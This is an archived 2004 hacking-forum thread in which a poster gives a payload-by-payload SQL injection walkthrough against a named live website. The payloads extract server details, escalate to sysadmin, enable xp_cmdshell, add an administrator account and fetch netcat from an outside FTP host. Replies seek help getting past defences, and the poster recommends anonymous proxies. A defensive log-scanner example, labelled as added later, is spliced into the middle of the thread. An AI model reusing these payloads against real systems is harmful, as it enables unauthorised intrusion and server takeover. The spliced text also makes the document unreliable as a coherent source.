IT Security and Insecurity Portal
DO u think u know everything about sql injection heh?

Posted: Mon Dec 27, 2004 6:53 pm
r0ot
Regular user
Joined: Jul 18, 2004
Posts: 15

Sorry, I was missing from here for almost a year.. but I'm back..
SQL INJECTION GATHERED FROM MASTERVN
REVISION 0.1
RELEASE A
EXAMPLE TO USE:
http://www.nhaxinh.com.vn/FullStory.asp?id=1
Exploiting the hole:
http://www.nhaxinh.com.vn/FullStory.asp?id=1'
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]
Unclosed quotation mark before the character string ''.
/Including/general.asp, line 840
VERSION
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@version)--
Code:
[SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 7.00 - 7.00.1063 (Intel X86) Apr 9 2002 14:18:16 Copyright © 1988-2002 Microsoft Corporation Enterprise Edition on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int.
/Including/general.asp, line 840
SERVER NAME
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,@@servername)--
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'UNESCO' to a column of data type int.
/Including/general.asp, line 840
DATABASE NAME
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,db_name())--
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'NhaXinh' to a column of data type int.
/Including/general.asp, line 840
USER
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,system_user)--
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'nhaxinh' to a column of data type int.
/Including/general.asp, line 840
OPENING REMOTE LINK (http://msdn.microsoft.com/library/default.asp?url=/library/en-us/tsqlref/ts_oa-oz_78z8.asp)
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server] Ad hoc access to OLE DB provider 'sqloledb' has been denied. You must access this provider through a linked server.
/Including/general.asp, line 840
GUEST = DB_OWNER :DDD
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysusers' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set sid=0x01,roles=0x01 where name=''guest''','xx' exec sp_executesql N'drop view dbo.test'--
Code:
No result expected, normal page loading
Enables us to do some nice stuff like xp_regwrite and xp_cmdshell
ADDING TO "BUILTIN\ADMINISTRATORS"
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec sp_executesql N'create view dbo.test as select * from master.dbo.sysxlogins' exec sp_msdropretry 'xx update sysusers set sid=0x01 where name=''dbo''','xx' exec sp_msdropretry 'xx update dbo.test set xstatus=18 where name=''BUILTIN\ADMINISTRATORS''','xx' exec sp_executesql N'drop view dbo.test'--
and then
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..sp_addsrvrolemember 'nhaxinh',sysadmin --
ENABLE OPENROWSET/OLEDB
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb','';;,'')--
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80004005'
[Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'SYSTEM'.
/Including/general.asp, line 840
http://www.nhaxinh.com.vn/FullStory.asp?id=1;exec master..xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Services\Tcpip\Parameters','EnableSecurityFilters'
ENABLE MASTER..XP_CMDSHELL & "ALLOW UPDATES"
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')
!!PAY ATTENTION TO THE SERVER= PARAMETER
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Could not process object 'set fmtonly off master..sp_addextendedproc xp_cmd 'xpsql70.dll' exec sp_configure 'allow updates', '1' reconfigure with override'. The OLE DB provider 'sqloledb' indicates that the object has no columns.
/Including/general.asp, line 840
If it doesn't work, try:
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..sp_addextendedproc xp_cmd,''xpsql70.dll'' exec sp_configure ''allow updates'', ''1'' reconfigure with override')--
NOW SCRIPT KIDDIES
http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'ipconfig'--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select top 1 b from t where b like '%25IP Address%25'))-- (%25 == "%")
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value ' IP Address. . . . . . . . . . . . : 203.162.7.70 ' to a column of data type int.
/Including/general.asp, line 840
C:\> ping 203.162.7.70
Pinging 203.162.7.70 with 32 bytes of data:
Reply from 203.162.7.70: bytes=32 time=232ms TTL=118
C:\> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service (Version 5.0).
User (203.162.7.70:(none)):
203.162.7.70 == panvietnam.com
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec xp_cmdshell "net user a /add %26 net localgroup administrators a /add"')-- (%26 == "&")
Code:
C:\> ftp 203.162.7.70
Connected to 203.162.7.70.
220 unesco Microsoft FTP Service
(Version 5.0).
User (203.162.7.70:(none)): a
331 Password required for a.
Password:
530 User a cannot log in.
Login failed.
ftp> bye
UPLOAD NETCAT
http://www.nhaxinh.com.vn/FullStory.asp?id=1;select * from openrowset('sqloledb', 'server=UNESCO;uid=BUILTIN\Administrators;pwd=', 'set fmtonly off select 1 exec master..xp_cmdshell "echo open a.b.c.d %3Ef %26 echo user a a %3E%3Ef %26 echo bin %3E%3Ef %26 echo cd a %3E%3Ef %26 echo mget * %3E%3Ef %26 echo quit %3E%3Ef %26 ftp -v -i -n -s%3Af" %26 del f')-- (%3E == ">")
Code:
echo open a.b.c.d >f
echo user a a >>f
echo bin >> f
echo cd a >>f
echo mget * >>f
echo quit >>f
ftp -v -i -n -s:f
del f
http://www.nhaxinh.com.vn/FullStory.asp?id=1;drop table t create table t(a int identity,b varchar(1000)) insert into t exec master..xp_cmdshell 'dir nx.exe'--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=1))--
http://www.nhaxinh.com.vn/FullStory.asp?id=1 and 1=convert(int,(select b from t where a=6))--
Code:
Microsoft OLE DB Provider for ODBC Drivers error '80040e07'
[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the varchar value '08/17/2003 11:31a 11,776 nx.exe' to a column of data type int.
/Including/general.asp, line 840
Enjoy, and happy SQL injection, guys
_________________
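From the defender's side, the request strings quoted in the post above are easy to spot in web server logs once the query string is URL-decoded. The following Python scanner is an added example, not part of r0ot's post or the MasterVN material; it assumes IIS W3C log lines in the field order shown in its header, and the log records, client IPs and signature names are constructed for the example.

```python
import re
from urllib.parse import unquote_plus

# Signatures drawn from the request strings quoted above: the trailing-quote probe,
# convert(int, ...) error-based extraction, stacked queries, the openrowset linked-server
# trick, xp_cmdshell and the sysusers/sysxlogins procedures. Names are this example's own.
SIGNATURES = {
    "error-based extraction": re.compile(r"convert\s*\(\s*int\s*,", re.I),
    "stacked query": re.compile(r";\s*(select|exec|drop|create|insert)\b", re.I),
    "openrowset link": re.compile(r"openrowset\s*\(\s*'sqloledb'", re.I),
    "os command exec": re.compile(r"xp_cmdshell", re.I),
    "privilege escalation": re.compile(r"sp_addsrvrolemember|sp_msdropretry|sysxlogins", re.I),
    "trailing quote probe": re.compile(r"'\s*$"),
}

def decode_query(raw):
    """URL-decode a cs-uri-query value twice, so the %25 / %26 / %3E tricks and
    double-encoded payloads are matched in their plain form."""
    return unquote_plus(unquote_plus(raw))

def classify(query):
    """Return the names of every signature that matches a decoded query string."""
    return [name for name, rx in SIGNATURES.items() if rx.search(query)]

def scan_iis_log(lines):
    """Scan IIS W3C lines (date time c-ip cs-method cs-uri-stem cs-uri-query sc-status)
    and return (c-ip, cs-uri-stem, [signature names]) for every suspicious request."""
    hits = []
    for line in lines:
        fields = line.split()
        if not fields or fields[0].startswith("#") or len(fields) < 7:
            continue  # header/comment line or truncated record
        ip, stem, query = fields[2], fields[4], fields[5]
        found = classify(decode_query(query)) if query != "-" else []
        if found:
            hits.append((ip, stem, found))
    return hits

# Constructed sample log: the requests from the post above as IIS would record
# them (spaces as '+'), plus two benign requests. Client IPs are made up.
SAMPLE_LOG = """\
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2004-12-27 18:53:01 10.0.0.5 GET /FullStory.asp id=1 200
2004-12-27 18:53:09 10.0.0.5 GET /FullStory.asp id=1' 500
2004-12-27 18:53:20 10.0.0.5 GET /FullStory.asp id=1+and+1=convert(int,@@version)-- 500
2004-12-27 18:54:02 10.0.0.5 GET /FullStory.asp id=1;select+*+from+openrowset('sqloledb','';;,'')-- 500
2004-12-27 18:55:40 10.0.0.5 GET /FullStory.asp id=1;drop+table+t+create+table+t(a+int+identity,b+varchar(1000))+insert+into+t+exec+master..xp_cmdshell+'ipconfig'-- 200
2004-12-27 18:56:10 10.0.0.5 GET /FullStory.asp id=1+and+1=convert(int,(select+top+1+b+from+t+where+b+like+'%25IP+Address%25'))-- 500
2004-12-27 19:01:00 10.0.0.9 GET /FullStory.asp id=42 200""".splitlines()
```

Running `scan_iis_log(SAMPLE_LOG)` flags the five injected requests from one client and none of the benign ones; a 500 status next to a `convert(int,` hit is the error-based extraction succeeding, which is the event worth alerting on.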

Posted: Mon Dec 27, 2004 9:18 pm
Postal
Regular user
Joined: Dec 24, 2004
Posts: 5
Location: Latvija

Nice to see you back!
And thanks for this

_________________ Born to learn!!!

Posted: Mon Dec 27, 2004 10:43 pm
any2000
Active user
Joined: Dec 02, 2004
Posts: 26

Many, many thanks for this

Posted: Mon Dec 27, 2004 11:44 pm
r0ot
Regular user
Joined: Jul 18, 2004
Posts: 15

heheh, it's nice to come back again.. I spent the whole year studying a lot and, more importantly, improving my SQL admin / dev skills; as you can see above, I've got much to learn... :/ duh
Comments about the code, variations of it, etc. are appreciated.
Regards
_________________

Posted: Wed Dec 29, 2004 5:15 pm
ReFleX
Active user
Joined: Nov 05, 2004
Posts: 39
Location: ARGENTINA!

Hi! A very good job. I was trying it but I get this error when I execute the last injections
Code:
[Microsoft][ODBC SQL Server Driver][SQL Server]Login failed for user 'BUILTIN\Administrators'.

Does somebody know why this could be??

Posted: Thu Dec 30, 2004 11:51 am
r0ot
Regular user
Joined: Jul 18, 2004
Posts: 15

Some of the beginning queries didn't work out, so you couldn't add a user to the users... :/ bad.. Try to review the queries and re-exec them; remember, always try to use a good anon proxy
_________________

Posted: Sun Feb 13, 2005 11:05 am
dairy123
Beginner
Joined: Feb 13, 2005
Posts: 4

That was an extremely cool tut - so much thanks, r00t.
Just in time, as I was losing sleep trying to figure out which sys tables, SPs and XPs to use; you saved me so many nights!!
Looks like I am getting the same message
Login failed for user 'BUILTIN\Administrators'.
The SQL admin seems to be a bit knowledgeable - disabled select on the password column of sysxlogins.
Any thoughts on how I can elevate the user's privileges?
Thnx much

Posted: Tue Nov 01, 2005 7:13 am
linzi
Beginner
Joined: Nov 01, 2005
Posts: 4

Very good, I have learned more SQL injection skills from yours

Posted: Thu Dec 08, 2005 11:46 am
goblin
Regular user
Joined: Nov 03, 2005
Posts: 8

Thx, you have a job! I am learning it now. So if someone wants to do injection like that, you must master ODBC

Posted: Tue Dec 20, 2005 9:22 pm
vcore
Regular user
Joined: Jun 28, 2005
Posts: 13

Thank you. Two questions:
What's the difference between AND and &?
And when I put 1 and 1=convert(int,@@version)-- I have a "type mismatch"
(generally CInt); how should I fix this?
Sorry for my English
www.waraxe.us Forum Index -> Sql injection